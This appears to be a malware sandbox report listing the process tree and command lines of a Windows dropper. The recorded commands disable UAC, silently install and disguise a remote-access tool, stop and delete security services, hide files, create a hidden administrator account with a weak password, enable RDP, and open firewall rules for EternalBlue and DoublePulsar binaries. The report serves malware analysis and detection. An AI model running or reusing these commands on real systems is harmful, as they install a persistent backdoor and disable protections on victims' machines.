PID 5188 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe C:\ProgramData\Microsoft\Intel\wini.exe
PID 5188 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe C:\ProgramData\Microsoft\Intel\wini.exe
PID 1776 wrote to memory of 4404 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 1776 wrote to memory of 4404 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 1776 wrote to memory of 4404 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 1776 wrote to memory of 4484 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\ProgramData\Windows\winit.exe
PID 1776 wrote to memory of 4484 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\ProgramData\Windows\winit.exe
PID 1776 wrote to memory of 4484 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\ProgramData\Windows\winit.exe
PID 4404 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4404 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4404 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4716 wrote to memory of 5956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 4716 wrote to memory of 5956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 4716 wrote to memory of 5956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 4716 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 4716 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 4716 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 4716 wrote to memory of 3812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4716 wrote to memory of 3812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4716 wrote to memory of 3812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4716 wrote to memory of 5764 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 4716 wrote to memory of 5764 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 4716 wrote to memory of 5764 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 4716 wrote to memory of 4560 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 4716 wrote to memory of 4560 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 4716 wrote to memory of 4560 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 5188 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe C:\ProgramData\install\sys.exe
PID 5188 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe C:\ProgramData\install\sys.exe
PID 5188 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe C:\ProgramData\install\sys.exe
PID 4716 wrote to memory of 4620 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 4716 wrote to memory of 4620 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 4716 wrote to memory of 4620 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 5320 wrote to memory of 5172 N/A C:\ProgramData\Windows\rutserv.exe C:\ProgramData\Windows\rfusclient.exe
PID 5320 wrote to memory of 5172 N/A C:\ProgramData\Windows\rutserv.exe C:\ProgramData\Windows\rfusclient.exe
PID 5320 wrote to memory of 5172 N/A C:\ProgramData\Windows\rutserv.exe C:\ProgramData\Windows\rfusclient.exe
PID 5320 wrote to memory of 3336 N/A C:\ProgramData\Windows\rutserv.exe C:\ProgramData\Windows\rfusclient.exe
PID 5320 wrote to memory of 3336 N/A C:\ProgramData\Windows\rutserv.exe C:\ProgramData\Windows\rfusclient.exe
PID 5320 wrote to memory of 3336 N/A C:\ProgramData\Windows\rutserv.exe C:\ProgramData\Windows\rfusclient.exe
PID 4716 wrote to memory of 5732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4716 wrote to memory of 5732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4716 wrote to memory of 5732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4716 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4716 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4716 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4716 wrote to memory of 2120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4716 wrote to memory of 2120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4716 wrote to memory of 2120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4716 wrote to memory of 1112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4716 wrote to memory of 1112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4716 wrote to memory of 1112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4716 wrote to memory of 936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4716 wrote to memory of 936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4716 wrote to memory of 936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4484 wrote to memory of 1448 N/A C:\ProgramData\Windows\winit.exe C:\Windows\SysWOW64\cmd.exe
PID 4484 wrote to memory of 1448 N/A C:\ProgramData\Windows\winit.exe C:\Windows\SysWOW64\cmd.exe
PID 4484 wrote to memory of 1448 N/A C:\ProgramData\Windows\winit.exe C:\Windows\SysWOW64\cmd.exe
PID 1448 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1448 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1448 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 5172 wrote to memory of 5380 N/A C:\ProgramData\Windows\rfusclient.exe C:\ProgramData\Windows\rfusclient.exe
PID 5172 wrote to memory of 5380 N/A C:\ProgramData\Windows\rfusclient.exe C:\ProgramData\Windows\rfusclient.exe
PID 5172 wrote to memory of 5380 N/A C:\ProgramData\Windows\rfusclient.exe C:\ProgramData\Windows\rfusclient.exe
PID 5188 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe C:\programdata\install\cheat.exe

System policy modification

defense_evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A

Views/modifies file attributes

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe

"C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe

C:\ProgramData\Microsoft\Intel\wini.exe

C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"

C:\ProgramData\Windows\winit.exe

"C:\ProgramData\Windows\winit.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg1.reg"

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg2.reg"

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /silentinstall

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /firewall

C:\ProgramData\install\sys.exe

C:\ProgramData\install\sys.exe

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /start

C:\ProgramData\Windows\rutserv.exe

C:\ProgramData\Windows\rutserv.exe

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe /tray

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows\*.*

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows

C:\Windows\SysWOW64\sc.exe

sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000

C:\Windows\SysWOW64\sc.exe

sc config RManService obj= LocalSystem type= interact type= own

C:\Windows\SysWOW64\sc.exe

sc config RManService DisplayName= "Microsoft Framework"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe /tray

C:\programdata\install\cheat.exe

C:\programdata\install\cheat.exe -pnaxui

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete swprv

C:\Windows\SysWOW64\sc.exe

sc delete swprv

C:\ProgramData\Microsoft\Intel\taskhost.exe

"C:\ProgramData\Microsoft\Intel\taskhost.exe"

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)

C:\Programdata\WindowsTask\winlogon.exe

C:\Programdata\WindowsTask\winlogon.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /C schtasks /query /fo list

C:\programdata\microsoft\intel\R8.exe

C:\programdata\microsoft\intel\R8.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /query /fo list

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appidsvc

C:\Windows\SysWOW64\sc.exe

sc start appidsvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appmgmt

C:\Windows\SysWOW64\sc.exe

sc start appmgmt

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\rdp\Rar.exe

"Rar.exe" e -p555 db.rar

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

C:\Windows\SysWOW64\sc.exe

sc config appidsvc start= auto

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto

C:\Windows\SysWOW64\sc.exe

sc config appmgmt start= auto

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ipconfig /flushdns

C:\Windows\system32\ipconfig.exe

ipconfig /flushdns

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete swprv

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop mbamservice

C:\Windows\SysWOW64\sc.exe

sc delete swprv

C:\Windows\SysWOW64\sc.exe

sc stop mbamservice

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c gpupdate /force

C:\Windows\system32\gpupdate.exe

gpupdate /force

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc stop bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc delete bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete mbamservice

C:\Windows\SysWOW64\sc.exe

sc delete mbamservice

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete crmsvc

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\sc.exe

sc delete crmsvc

C:\Windows\SysWOW64\netsh.exe

netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete "windows node"

C:\Windows\SysWOW64\sc.exe

sc delete "windows node"

C:\Windows\SysWOW64\net.exe

net.exe user "john" "12345" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user "john" "12345" /add

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer

C:\Windows\SysWOW64\sc.exe

sc stop Adobeflashplayer

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\net.exe

net localgroup "Администраторы" "John" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Администраторы" "John" /add

C:\Windows\SysWOW64\net.exe

net localgroup "Administratorzy" "John" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add

C:\Windows\SysWOW64\net.exe

net localgroup "Administrators" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administrators" John /add

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop MoonTitle

C:\Windows\SysWOW64\net.exe

net localgroup "Administradores" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administradores" John /add

C:\Windows\SysWOW64\sc.exe

sc stop MoonTitle

C:\Windows\SysWOW64\sc.exe

sc delete AdobeFlashPlayer

C:\Windows\SysWOW64\net.exe

net localgroup "Пользователи удаленного рабочего стола" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add

C:\Windows\SysWOW64\net.exe

net localgroup "Пользователи удаленного управления" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add

C:\Windows\SysWOW64\net.exe

net localgroup "Remote Desktop Users" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete MoonTitle"

C:\Windows\SysWOW64\net.exe

net localgroup "Usuarios de escritorio remoto" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add

C:\Windows\SysWOW64\sc.exe

sc delete MoonTitle"

C:\Windows\SysWOW64\net.exe

net localgroup "Uzytkownicy pulpitu zdalnego" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add

C:\rdp\RDPWInst.exe

"RDPWInst.exe" -i -o

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -s TermService

C:\Windows\SysWOW64\sc.exe

sc stop clr_optimization_v4.0.30318_64

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"

C:\Windows\SysWOW64\sc.exe

sc delete clr_optimization_v4.0.30318_64"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -s TermService

C:\Windows\SysWOW64\sc.exe

sc stop MicrosoftMysql

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Windows\SysWOW64\sc.exe

sc delete MicrosoftMysql

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out

C:\Windows\SYSTEM32\netsh.exe

netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out

C:\rdp\RDPWInst.exe

"RDPWInst.exe" -w

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\net.exe

net accounts /maxpwage:unlimited

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 accounts /maxpwage:unlimited

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\Program Files\RDP Wrapper\*.*"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\Program Files\RDP Wrapper"

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\rdp"

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255

C:\Windows\SysWOW64\cmd.exe

